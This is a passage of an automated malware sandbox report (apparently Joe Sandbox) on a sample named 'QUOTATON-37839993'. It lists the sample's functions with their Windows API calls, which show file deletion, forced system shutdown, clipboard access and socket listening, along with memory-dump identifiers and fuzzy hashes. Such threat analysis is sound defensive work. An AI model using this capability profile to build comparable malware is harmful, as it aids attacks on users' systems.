                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00E92BEC,?), ref: 00E7846E
                                                                      • IIDFromString.OLE32(?,?), ref: 00E784E1
                                                                      • VariantInit.OLEAUT32(?), ref: 00E7857B
                                                                      • VariantClear.OLEAUT32(?), ref: 00E785DC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 834269672-1287834457
                                                                      • Opcode ID: 66c60cea0c63f59efab0e0613948b42232e63f4734d4b74aa33b0f191ba889bd
                                                                      • Instruction ID: 5502097fe410106ef4fb15bf2aa88fc749cb4491f815a172232a69716bd648a2
                                                                      • Opcode Fuzzy Hash: 66c60cea0c63f59efab0e0613948b42232e63f4734d4b74aa33b0f191ba889bd
                                                                      • Instruction Fuzzy Hash: B761E1706483129FC710DF14DA4CFAAB7E8AF54744F009419F989BB291DB70ED48CB92
                                                                      Function 00E74164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: bd6e2da9af2afde42ab9e5f805371e65a78a49e4da8f6d9f166df428491914b5
                                                                      • Instruction ID: 142799d15ed04d29e29f5948a8bb7ad935eee7b4781ca2c985b8228a74d4dff0
                                                                      • Opcode Fuzzy Hash: bd6e2da9af2afde42ab9e5f805371e65a78a49e4da8f6d9f166df428491914b5
                                                                      • Instruction Fuzzy Hash: 6E219F75201614DFDB14AF65EC09B697BA8EF04711F10C029F94AFB2B2DB30AC55CB94
                                                                      Function 00E637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770
                                                                        • Part of subcall function 00E64A31: GetFileAttributesW.KERNEL32(?,00E6370B), ref: 00E64A32
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E638A3
                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E6394B
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00E6395E
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E6397B
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6399D
                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E639B9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 4002782344-1173974218
                                                                      • Opcode ID: c49955de5a6a06f1c8e5ea1215d46d951cf12fdba8117a532d2f5f1cf56d6d66
                                                                      • Instruction ID: 09f6d81ae170f1e02ed671713bf55bae9c0deb8ee3d7837fba6eb988d77fdd98
                                                                      • Opcode Fuzzy Hash: c49955de5a6a06f1c8e5ea1215d46d951cf12fdba8117a532d2f5f1cf56d6d66
                                                                      • Instruction Fuzzy Hash: 3C519D7184414DAECF05EBA0EA929EEB7B8AF54344F602069E446B71D1EB316F49CF60
                                                                      Function 00E6F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E6F440
                                                                      • Sleep.KERNEL32(0000000A), ref: 00E6F470
                                                                      • _wcscmp.LIBCMT ref: 00E6F484
                                                                      • _wcscmp.LIBCMT ref: 00E6F49F
                                                                      • FindNextFileW.KERNEL32(?,?), ref: 00E6F53D
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6F553
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                      • String ID: *.*
                                                                      • API String ID: 713712311-438819550
                                                                      • Opcode ID: baf94cd46f57d4e054450e9c2df576e2b9d4f913944c3b448d278807af3ee531
                                                                      • Instruction ID: 964623a4d7e978b96b6294b22295b3f2b16099936924f049a57c4138f048af7a
                                                                      • Opcode Fuzzy Hash: baf94cd46f57d4e054450e9c2df576e2b9d4f913944c3b448d278807af3ee531
                                                                      • Instruction Fuzzy Hash: 86418D72840219AFCF14EF64EC45AEEBBB4FF04354F105466E819B2191EB309E84CF50
                                                                      Function 00E13030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __itow__swprintf
                                                                      • String ID: 3c$_
                                                                      • API String ID: 674341424-4099079164
                                                                      • Opcode ID: 139928ebe60c3dcecec6bec3b612e0621441a1764702f379a8e9c32f31084f1e
                                                                      • Instruction ID: a419e0110de250ccb48329669b3964455363dd9c0f8d42995ada23d987deb7ca
                                                                      • Opcode Fuzzy Hash: 139928ebe60c3dcecec6bec3b612e0621441a1764702f379a8e9c32f31084f1e
                                                                      • Instruction Fuzzy Hash: F2229F716083009FD724DF24D881BAFB7E4BF85714F10691DF89AA7292DB71E984CB92
                                                                      Function 00E15760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 4edaabb8656f2099ea2c5ef8293d3ab28dbf0169a789358b6a04a083313c6f72
                                                                      • Instruction ID: 83330af36361e54352d38c2900551e881cdb636c76e25f12088c9d15c73fe97e
                                                                      • Opcode Fuzzy Hash: 4edaabb8656f2099ea2c5ef8293d3ab28dbf0169a789358b6a04a083313c6f72
                                                                      • Instruction Fuzzy Hash: 8712BA71A00609DFDF04DFA5D981AEEB3F5FF88300F106929E856B7290EB35A994CB50
                                                                      Function 00E63B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770
                                                                        • Part of subcall function 00E64A31: GetFileAttributesW.KERNEL32(?,00E6370B), ref: 00E64A32
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E63B89
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E63BD9
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E63BEA
                                                                      • FindClose.KERNEL32(00000000), ref: 00E63C01
                                                                      • FindClose.KERNEL32(00000000), ref: 00E63C0A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: 96c35597857735234897645342c57315d420f86d37b9f56c796aac56a7d8896f
                                                                      • Instruction ID: f283a50d2e666151cad6ac1c5f156160fc32167fe6f62ca89a175ddc16ff0965
                                                                      • Opcode Fuzzy Hash: 96c35597857735234897645342c57315d420f86d37b9f56c796aac56a7d8896f
                                                                      • Instruction Fuzzy Hash: 4F316F714483859FC301EF64D8918AFB7E8AE95304F446D2DF4D5A21D1EB21EE49CB62
                                                                      Function 00E651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E5882B
                                                                        • Part of subcall function 00E587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58858
                                                                        • Part of subcall function 00E587E1: GetLastError.KERNEL32 ref: 00E58865
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00E651F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-194228
                                                                      • Opcode ID: 516017918a7725fd42d54ea56a0631dbe3fc39987613cb90884ab7963c2d6c07
                                                                      • Instruction ID: 26766122158534653c2a09ec4aff660c225bc60ea90b3dcf6c69f31e70d297ed
                                                                      • Opcode Fuzzy Hash: 516017918a7725fd42d54ea56a0631dbe3fc39987613cb90884ab7963c2d6c07
                                                                      • Instruction Fuzzy Hash: 5801D4327D16116EE7286268BCAAFBA73A89B053C5F202821F957F20E2D9511C048690
                                                                      Function 00E76283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E762DC
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E762EB
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00E76307
                                                                      • listen.WSOCK32(00000000,00000005), ref: 00E76316
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E76330
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00E76344
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                      • String ID:
                                                                      • API String ID: 1279440585-0
                                                                      • Opcode ID: 6b7963d808428f93fb09edbc00b7362d9d9c8706c3466bf2cd56a794b7be778f
                                                                      • Instruction ID: a89b30c536c64d2462d1dab5a2318e47a258aad38f08a73c4d351c5c19a1f3b6
                                                                      • Opcode Fuzzy Hash: 6b7963d808428f93fb09edbc00b7362d9d9c8706c3466bf2cd56a794b7be778f
                                                                      • Instruction Fuzzy Hash: AE21E171600600AFCB10EF64C845B6EB7E9EF89328F149559F85AB73D2C770AD45CB51
                                                                      Function 00E15520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E20DB6: std::exception::exception.LIBCMT ref: 00E20DEC
                                                                        • Part of subcall function 00E20DB6: __CxxThrowException@8.LIBCMT ref: 00E20E01
                                                                      • _memmove.LIBCMT ref: 00E50258
                                                                      • _memmove.LIBCMT ref: 00E5036D
                                                                      • _memmove.LIBCMT ref: 00E50414
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1300846289-0
                                                                      • Opcode ID: f84080c8022166f86ce18bd6b7f58704958075632730d10a049d1cf2fb882368
                                                                      • Instruction ID: f6c4ff2d184e7340af1f3b1da92c3901e835a5b07d13d2289210366d7fb847ab
                                                                      • Opcode Fuzzy Hash: f84080c8022166f86ce18bd6b7f58704958075632730d10a049d1cf2fb882368
                                                                      • Instruction Fuzzy Hash: 7F02C071A00209DFCF04DF64D981AAEBBF5EF84300F549469E84AFB295EB31D994CB91
                                                                      Function 00E01287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E019FA
                                                                      • GetSysColor.USER32(0000000F), ref: 00E01A4E
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00E01A61
                                                                        • Part of subcall function 00E01290: DefDlgProcW.USER32(?,00000020,?), ref: 00E012D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ColorProc$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 3744519093-0
                                                                      • Opcode ID: cf7e3248379f27c3bac016f39d593ada6cfda072d60df4989a3a85c525770271
                                                                      • Instruction ID: bc866b77585c70c0cb0fe34efde1d512845922cb4140e9e9ae42ae7b87425cdd
                                                                      • Opcode Fuzzy Hash: cf7e3248379f27c3bac016f39d593ada6cfda072d60df4989a3a85c525770271
                                                                      • Instruction Fuzzy Hash: F6A13971206544BED729ABA98C48EBB39ACDB82349F24315EF607FD1D2CA219DC1D371
                                                                      Function 00E6BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E6BCE6
                                                                      • _wcscmp.LIBCMT ref: 00E6BD16
                                                                      • _wcscmp.LIBCMT ref: 00E6BD2B
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00E6BD3C
                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00E6BD6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 2387731787-0
                                                                      • Opcode ID: 4e04e6123db852c2603e145f71dd09bc5e3f21e439794279a3f72642eaa2f51d
                                                                      • Instruction ID: 3703785e8ce49325bef765ce50801dc2de4d33b5dd9a845ddb0ff9871e81a601
                                                                      • Opcode Fuzzy Hash: 4e04e6123db852c2603e145f71dd09bc5e3f21e439794279a3f72642eaa2f51d
                                                                      • Instruction Fuzzy Hash: B451AD75A046029FC718DF28E490E9AB7E8EF49364F00551DE95AEB3A2DB30ED44CB91
                                                                      Function 00E76747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E77DB6
                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E7679E
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E767C7
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00E76800
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E7680D
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00E76821
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 99427753-0
                                                                      • Opcode ID: e44cda78f96022488f8b90c51abb24f72471073e99d46a061ea336ddacad7a1b
                                                                      • Instruction ID: 107003bfdb5b2e5c14f6f4f0b420277281c000b1e8220809cd69975bccb74618
                                                                      • Opcode Fuzzy Hash: e44cda78f96022488f8b90c51abb24f72471073e99d46a061ea336ddacad7a1b
                                                                      • Instruction Fuzzy Hash: F841D175A00600AFEB14AF648C86F6E77E8DF45724F04D558FA59BB3D3CA709D408BA2
                                                                      Function 00E85376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                      • String ID:
                                                                      • API String ID: 292994002-0
                                                                      • Opcode ID: c7dd46515eccb0ad50f8ea48941d879d53fbe4273d0762b1a84c7c3af94d61c5
                                                                      • Instruction ID: 3182644f9e835ee7c9af30aed30941d871b38da0505759427ca26a93bc370f8f
                                                                      • Opcode Fuzzy Hash: c7dd46515eccb0ad50f8ea48941d879d53fbe4273d0762b1a84c7c3af94d61c5
                                                                      • Instruction Fuzzy Hash: D911B232300911AFEB217F269C44A6A7B99FF447A1B505439F84EF7251DF709C4187A0
                                                                      Function 00E580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E580C0
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E580CA
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E580D9
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E580E0
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E580F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: f70cde26ba4d04e17bce5e089fd5856116e36d85f7f1c6abb5f1d94dc5eabf1c
                                                                      • Instruction ID: f325f17ada38344aaa19c215ba850c1c76573970159c1c155df275cbab9e8cb1
                                                                      • Opcode Fuzzy Hash: f70cde26ba4d04e17bce5e089fd5856116e36d85f7f1c6abb5f1d94dc5eabf1c
                                                                      • Instruction Fuzzy Hash: 1AF06231242304EFEB104FA6ED8DE673BACEF49759B100425F949F6150DB61DC49EB60
                                                                      Function 00E04B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                      Download Yara Rule
